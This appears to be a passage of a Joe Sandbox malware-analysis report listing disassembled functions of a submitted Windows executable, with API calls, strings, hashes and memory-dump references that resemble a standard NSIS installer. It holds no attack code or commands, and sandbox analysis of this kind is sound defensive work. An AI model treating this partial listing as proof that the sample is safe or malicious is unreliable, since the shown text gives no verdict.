                                                        • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                        APIs
                                                        • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                        • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2740478559-0
                                                        • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                        • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                        • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                        • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                        APIs
                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                        • CharNextW.USER32(?,004D70C8,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                        • CharPrevW.USER32(?,?,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                        Strings
                                                        • "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe", xrefs: 00406042
                                                        • *?|<>/":, xrefs: 0040608A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe"$*?|<>/":
                                                        • API String ID: 589700163-1417691532
                                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                        APIs
                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                        Strings
                                                        • Exec: success ("%s"), xrefs: 00402263
                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                        • Exec: command="%s", xrefs: 00402241
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                        • API String ID: 2014279497-3433828417
                                                        • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                        • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                        • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                        • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                        • GetMessagePos.USER32 ref: 00404871
                                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                        • MulDiv.KERNEL32(00010000,00000064,?), ref: 00403295
                                                        • wsprintfW.USER32 ref: 004032A5
                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                        Strings
                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%
                                                        • API String ID: 1451636040-82062127
                                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                        APIs
                                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                        • wsprintfW.USER32 ref: 00404457
                                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$@rD
                                                        • API String ID: 3540041739-1813061909
                                                        • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                        • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Close$DeleteEnumOpen
                                                        • String ID:
                                                        • API String ID: 1912718029-0
                                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                        APIs
                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                        • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                        APIs
                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        Strings
                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                        • API String ID: 1697273262-1764544995
                                                        • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                        • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00404902
                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID: $@rD
                                                        • API String ID: 3748168415-881980237
                                                        • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                        • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                        • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                        • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                        APIs
                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                          • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
